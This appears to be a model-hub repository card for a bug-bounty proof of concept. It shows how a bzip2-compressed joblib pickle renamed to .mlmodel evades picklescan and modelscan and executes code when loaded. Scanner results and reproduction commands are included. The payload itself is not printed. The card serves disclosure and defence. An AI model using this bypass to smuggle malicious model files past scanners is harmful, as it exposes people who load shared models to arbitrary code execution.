CoreML .mlmodel MFV PoC β Authorized Security Research
This repository contains a proof-of-concept for an authorized bug bounty submission.
Authorization Statement
This is authorized security research conducted under the huntr.com / Protect AI Model File Vulnerability (MFV) bug bounty program. Protect AI publicly invites researchers to find vulnerabilities in ML security tooling. All proof-of-concept work runs locally. This is responsible disclosure β findings are reported to vendors for remediation.
Vulnerability Summary
- Format: Apple CoreML
.mlmodel - Scanner Bypass: picklescan 1.0.4 + modelscan 0.8.8 (DUAL BYPASS, all 4 scan modes)
- Impact: Arbitrary Code Execution when malicious
.mlmodelfile is loaded - Technique: bzip2-compressed joblib payload β bzip2 header
BZh9crashes picklescan's pickle parser before any dangerous globals are detected
How It Works
.mlmodelextension is absent from picklescan's and modelscan's extension lists- A bzip2-compressed joblib file is renamed to
.mlmodel - Both scanners report clean (all modes: direct scan + directory scan)
joblib.load()transparently decompresses and deserializes β payload executes
Scanner Results
picklescan 1.0.4 -p malicious_model_final.mlmodel β Infected: 0, Dangerous globals: 0
picklescan 1.0.4 -p ./ β Scanned: 0
modelscan 0.8.8 -p malicious_model_final.mlmodel β No issues found!
modelscan 0.8.8 -p ./ β No issues found!
Files
malicious_model_final.mlmodelβ bzip2-compressed joblib payload with.mlmodelextensionpoc-mlmodel.pyβ reproduction script
Reproduction
pip install joblib picklescan modelscan
python3 poc-mlmodel.py
picklescan -p malicious_model_final.mlmodel
modelscan -p malicious_model_final.mlmodel
python3 -c "import joblib; print('BEFORE'); joblib.load('malicious_model_final.mlmodel'); print('AFTER')"
- Downloads last month
- -
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support